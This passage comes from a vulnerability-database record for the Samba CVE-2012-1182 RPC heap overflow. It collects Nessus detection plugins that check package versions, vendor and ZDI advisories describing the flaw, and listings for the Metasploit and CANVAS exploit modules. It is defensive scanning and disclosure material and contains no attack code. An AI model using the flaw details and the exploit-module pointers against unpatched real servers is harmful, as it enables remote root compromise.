value:\"p-cpe:/a:oracle:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:24", "description": "It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.", "edition": 16, "published": "2012-04-13T00:00:00", "title": "Debian DSA-2450-1 : samba - privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-04-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:samba"], "id": "DEBIAN_DSA-2450.NASL", "href": "https://www.tenable.com/plugins/nessus/58729", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2450. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58729);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"DSA\", value:\"2450\");\n\n script_name(english:\"Debian DSA-2450-1 : samba - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=668309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2450\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the samba packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libpam-smbpass\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient-dev\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libwbclient0\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common-bin\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-dbg\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc-pdf\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-tools\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"smbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"swat\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"winbind\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:50:23", "published": "2012-04-10T04:00:00", "id": "RHSA-2012:0466", "href": "https://access.redhat.com/errata/RHSA-2012:0466", "type": "redhat", "title": "(RHSA-2012:0466) Critical: samba3x security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:49:10", "published": "2012-04-13T04:00:00", "id": "RHSA-2012:0478", "href": "https://access.redhat.com/errata/RHSA-2012:0478", "type": "redhat", "title": "(RHSA-2012:0478) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n", "modified": "2018-06-06T20:24:36", "published": "2013-02-21T05:00:00", "id": "RHSA-2013:0506", "href": "https://access.redhat.com/errata/RHSA-2013:0506", "type": "redhat", "title": "(RHSA-2013:0506) Moderate: samba4 security, bug fix and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2018-06-06T20:24:30", "published": "2012-04-10T04:00:00", "id": "RHSA-2012:0465", "href": "https://access.redhat.com/errata/RHSA-2012:0465", "type": "redhat", "title": "(RHSA-2012:0465) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2016-09-25T14:13:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "description": "**Name**| CVE_2012_1182_NONX \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182-NONX \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate public: 04/10/2012 \nCVE Url: N/A \nCVSS: 0.0 \n\n", "edition": 1, "modified": "2012-04-10T17:55:02", "published": "2012-04-10T17:55:02", "id": "CVE_2012_1182_NONX", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182_NONX", "type": "canvas", "title": "Immunity Canvas: CVE_2012_1182_NONX", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:48:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "description": "**Name**| CVE_2012_1182 \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182 \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate Public: 04/10/2012 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-CVE-2012-1182 \nCVSS: 0.0 \n\n", "edition": 2, "modified": "2012-04-10T21:55:00", "published": "2012-04-10T21:55:00", "id": "CVE_2012_1182", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182", "title": "Immunity Canvas: CVE_2012_1182", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "\nSamba development team reports:\n\nSamba versions 3.6.3 and all versions previous to this\n\t are affected by a vulnerability that allows remote code\n\t execution as the \"root\" user from an anonymous connection.\nAs this does not require an authenticated connection it\n\t is the most serious vulnerability possible in a program,\n\t and users and vendors are encouraged to patch their Samba\n\t installations immediately.\n\n", "edition": 4, "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "BAF37CD2-8351-11E1-894E-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html", "title": "samba -- \"root\" credential remote code execution", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": " Samba 4 is the ambitious next version of the Samba suite that is being developed in parallel to the stable 3.0 series. The main emphasis in this branch is support for the Active Directory logon protocols used by Windows 2000 and above. ", "modified": "2012-05-03T07:32:37", "published": "2012-05-03T07:32:37", "id": "FEDORA:77AFB20FC7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: samba4-4.0.0-26.alpha11.fc15.6", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:01", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS INFO3 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-061/", "id": "ZDI-12-061", "title": "Samba ndr_pull_dfs_Info3 Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:41:02", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL SVCCTL StartServiceW request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "id": "ZDI-12-063", "title": "Samba NDR PULL SVCCTL StartServiceW Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:59", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL LSA TrustDomainInfoControllers request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "id": "ZDI-12-062", "title": "Samba NDR PULL LSA TrustDomainInfoControllers Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS EnumArray1 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "id": "ZDI-12-064", "title": "Samba NDR PULL DFS EnumArray1 Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:45", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "[3.5.10-115]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804644", "edition": 4, "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "ELSA-2012-0465", "href": "http://linux.oracle.com/errata/ELSA-2012-0465.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "edition": 4, "modified": "2012-04-16T00:00:00", "published": "2012-04-16T00:00:00", "id": "ELSA-2012-0478", "href": "http://linux.oracle.com/errata/ELSA-2012-0478.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "[4.0.0-55.rc4]\r\n- Fix dependencies of samba4-test package.\r\n- related: #896142\r\n \n[4.0.0-54.rc4]\r\n- Fix summary and description of dc subpackages.\r\n- resolves: #896142\r\n- Remove conflicting libsmbclient.7 manpage.\r\n- resolves: #896240\r\n \n[4.0.0-53.rc4]\r\n- Fix provides filter rules to remove conflicting libraries from samba4-libs.\r\n- resolves: #895718\r\n \n[4.0.0-52.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-51.rc4]\r\n- Make sure we use the same directory as samba package for the winbind pipe.\r\n- resolves: #886157\r\n \n[4.0.0-50.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-49.rc4]\r\n- Fix Netlogon AES encryption.\r\n- resolves: #885089\r\n \n[4.0.0-48.rc4]\r\n- Fix IPA trust AD lookup of users.\r\n- resolves: #878564\r\n \n[4.0.0-47.rc4]\r\n- Add require for krb5-libs >= 1.10 to samba4-libs.\r\n- resolves: #877533\r\n \n[4.0.0-46.rc4]\r\n- Rename /etc/sysconfig/samba4 to name to mach init scripts.\r\n- resolves: #877085\r\n \n[4.0.0-45.rc4]\r\n- Don't require samba4-common and samba4-test in samba4-devel package.\r\n- related: #871748\r\n \n[4.0.0-44.rc4]\r\n- Make libnetapi and internal library to fix dependencies.\r\n- resolves: #873491\r\n \n[4.0.0-43.rc4]\r\n- Move libnetapi and internal printing migration lib to libs package.\r\n- related: #766333\r\n \n[4.0.0-42.rc4]\r\n- Fix perl, pam and logrotate dependencies.\r\n- related: #766333\r\n \n[4.0.0-41.rc4]\r\n- Fix library dependencies found by rpmdiff.\r\n- Update winbind offline logon patch.\r\n- related: #766333\r\n \n[4.0.0-40.rc4]\r\n- Move libgpo to samba-common\r\n- resolves: #871748\r\n \n[4.0.0-39.rc4]\r\n- Rebase to version 4.0.0rc4.\r\n- related: #766333\r\n \n[4.0.0-38.rc3]\r\n- Add missing export KRB5CCNAME in init scripts.\r\n- resolves: #868419\r\n \n[4.0.0-37.rc3]\r\n- Move /var/log/samba to samba-common package for winbind which\r\n requires it.\r\n- resolves: #868248\r\n \n[4.0.0-36.rc3]\r\n- The standard auth modules need to be built into smbd to function.\r\n- resolves: #867854\r\n \n[4.0.0-35.rc3]\r\n- Move pam_winbind.conf to the package of the module.\r\n- resolves: #867317\r\n \n[4.0.0-34.rc3]\r\n- Built auth_builtin as static module.\r\n- related: #766333\r\n \n[4.0.0-33.rc3]\r\n- Add back the AES patches which didn't make it in rc3.\r\n- related: #766333\r\n \n[4.0.0-32.rc3]\r\n- Rebase to version 4.0.0rc3.\r\n- related: #766333\r\n \n[4.0.0-31.rc2]\r\n- Use alternatives to configure winbind_krb5_locator.so\r\n- resolves: #864889\r\n \n[4.0.0-30.rc2]\r\n- Fix multilib package installation.\r\n- resolves: #862047\r\n- Filter out libsmbclient and libwbclient provides.\r\n- resolves: #861892\r\n- Rebase to version 4.0.0rc2.\r\n- related: #766333\r\n \n[4.0.0-29.rc1]\r\n- Fix Requires and Conflicts.\r\n- related: #766333\r\n \n[4.0.0-28.rc1]\r\n- Move pam_winbind and wbinfo manpages to the right subpackage.\r\n- related: #766333\r\n \n[4.0.0-27.rc1]\r\n- Fix permission for init scripts.\r\n- Define a common KRB5CCNAME for smbd and winbind.\r\n- Set piddir back to /var/run in RHEL6.\r\n- related: #766333\r\n \n[4.0.0-26.rc1]\r\n- Add '-fno-strict-aliasing' to CFLAGS again.\r\n- related: #766333\r\n \n[4.0.0-25.rc1]\r\n- Build with syste libldb package which has been just added.\r\n- related: #766333\r\n \n[4.0.0-24.rc1]\r\n- Rebase to version 4.0.0rc1.\r\n- resolves: #766333", "edition": 4, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-0506", "href": "http://linux.oracle.com/errata/ELSA-2013-0506.html", "title": "samba4 security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "evolution-mapi\r\n[0.28.3-12]\r\n- Add patch for RH bug #903241 (Double-free on message copy/move)\r\n \n[0.28.3-11]\r\n- Add patch for RH bug #902932 (Cannot connect with latest samba)\r\n \n[0.28.3-10]\r\n- Drop multilib by obsoleting evolution-mapi < 0.28.3-9 (RH bug #886914).\r\n \n[0.28.3-9]\r\n- Adapt to OpenChange 1.0 (RH bug #767678).\r\n \n[0.28.3-8]\r\n- Add patch for RH bug #680061 (crash while setting props).\r\n \nopenchange\r\n[1.0-4]\r\n- Use current version (1.0-4) for a multilib obsolete (RH bug #881698).\r\n \n[1.0-3]\r\n- Add patch to be able to send large messages (RH bug #870405)\r\n \n[1.0-2]\r\n- Drop multilib by obsoleting openchange < 0.9 (RH bug #881698).\r\n \n[1.0-1]\r\n- Rebase to 1.0 using the rpm spec from Fedora 18.", "edition": 4, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-0515", "href": "http://linux.oracle.com/errata/ELSA-2013-0515.html", "title": "openchange security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds when \nhandling remote procedure calls (RPC) over the network. A remote, \nunauthenticated attacker could exploit this to execute arbitrary code as the \nroot user. (CVE-2012-1182)", "edition": 5, "modified": "2012-04-13T00:00:00", "published": "2012-04-13T00:00:00", "id": "USN-1423-1", "href": 